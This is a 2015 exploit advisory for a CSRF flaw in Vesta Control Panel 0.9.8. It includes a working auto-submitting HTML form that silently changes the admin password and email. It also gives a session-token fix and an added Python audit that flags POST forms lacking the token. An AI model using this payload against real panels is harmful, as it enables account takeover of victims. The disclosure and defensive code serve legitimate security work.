`# Exploit Title: Vesta Control Panel CSRF(change admin password)
# Date: 24-05-2015
# Exploit Author: Ben Khlifa Fahmi
# Vendor Homepage: https://vestacp.com/
# Software Link: http://vestacp.com/pub/vst-install.sh
# Version: 0.9.8(amd64)
# Tested on: ubuntu trusty 14.04
Description:
---------------------------------------------------------------
The vulnerability exists on the page /edit/user/index.php
Vesta CP is vulnerable to CSRF: an attacker can change the "admin" password
by sending a crafted page to an already logged-in user. Once the victim visits the page, the user's password is changed
to the one set by the attacker.
Exploit Code :
<html>
<head><title>Victim will redirect auto</title></head>
<body onload="document.forms[0].submit()">
<form>
<form id="vstobjects" method="post" name="v_edit_user" action="https://[target]:8083/edit/user/?user=admin">
<input type="hidden" name="v_user" value="admin" >
<input type="hidden" name="v_username" value="admin">
<input type="hidden" name="v_password" value="[hacker pass]">
<input type="hidden" name="v_email" value="[hacker mail]">
<input type="hidden" name="v_package" value="default" />
<input type="hidden" name="v_language" value="ar" />
<input type="hidden" name="v_fname" value="System">
<input type="hidden" name="v_lname" value="Administrator">
<input type="hidden" name="v_shell" value="bash" />
<input type="hidden" value="ns1.localhost.ltd">
<input type="hidden" value="ns2.localhost.ltd">
<input type="hidden" name="v_ns3">
<input type="hidden" name="v_ns4">
<input type="submit" class="button" name="save" value="Save">
</form>
</body>
</html>
Impact : Critical, as an attacker can change the admin email, password, DNS ....
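Solution :
Add this code to the page /edit/user/index.php after the session start:
// Unpredictable per-session token (uniqid()/mt_rand() output is guessable)
$token = bin2hex(openssl_random_pseudo_bytes(32));
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    // Form is being displayed: remember the token it will carry
    $_SESSION['token'] = $token;
} elseif (!isset($_POST['token'], $_SESSION['token'])
        || $_SESSION['token'] !== $_POST['token']) {
    // POST with a missing or wrong token: refuse and stop processing
    header('Location: /error/');
    exit;
}
And at the end of the page add:
$_SESSION['token'] = $token;
Also add this hidden input inside the form on the page: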
<form id="vstobjects" method="post" name="v_edit_user">
<input type="hidden" name="token" value="<?php echo $_SESSION['token'];?>"/>
Greetz to : ArabOUG Cyber Security Team, Tunisian Whitehat Security , Tunisian Agency of Internet Team , BenCure CERT Team(Ben Yahia Mohamed, Ben Salem Salma, Ben khlifa Fahmi(me), Moez Chakchouk, Ben Mne Tarek) Amine Zemzemi , Saif Bejaoui , Mohamed Amen Allah Bechikh , Youssef Warheni , Manel Nouali , Ben Gharbia Jihed , and all my friends
And a special Greetz to my fiancé <3
`
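
An added check, not part of the original advisory or Vesta's own code: a small Python audit that parses template markup and lists POST forms missing the hidden `token` input the Solution introduces. The sample markup is constructed from the form tag shown above, and the class and function names are this example's own.

```python
from html.parser import HTMLParser

TOKEN_FIELD = "token"  # hidden field name used by the Solution above

# Constructed samples: the page's form tag without and with the token input.
UNPATCHED = '''<form id="vstobjects" method="post" name="v_edit_user">
<input type="password" name="v_password">
</form>'''
PATCHED = '''<form id="vstobjects" method="post" name="v_edit_user">
<input type="hidden" name="token" value="<?php echo $_SESSION['token'];?>"/>
<input type="password" name="v_password">
</form>'''


class FormAudit(HTMLParser):
    """Record each <form> and whether it carries the hidden token field."""

    def __init__(self):
        super().__init__()
        self.forms = []     # one dict per form seen
        self._open = None   # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        # A <form> nested inside an open form is ignored, as browsers do.
        if tag == "form" and self._open is None:
            self._open = {"name": a.get("name") or a.get("id") or "(unnamed)",
                          "method": (a.get("method") or "get").lower(),
                          "has_token": False}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            hidden = (a.get("type") or "").lower() == "hidden"
            if hidden and a.get("name") == TOKEN_FIELD:
                self._open["has_token"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None


def unprotected_post_forms(markup):
    """Return the names of POST forms that lack the hidden token input."""
    audit = FormAudit()
    audit.feed(markup)
    audit.close()
    return [f["name"] for f in audit.forms
            if f["method"] == "post" and not f["has_token"]]


if __name__ == "__main__":
    print(unprotected_post_forms(UNPATCHED), unprotected_post_forms(PATCHED))
```

A form that passes this audit only shows that the field is rendered; the server-side comparison against the session token still has to reject POSTs where it is missing or wrong.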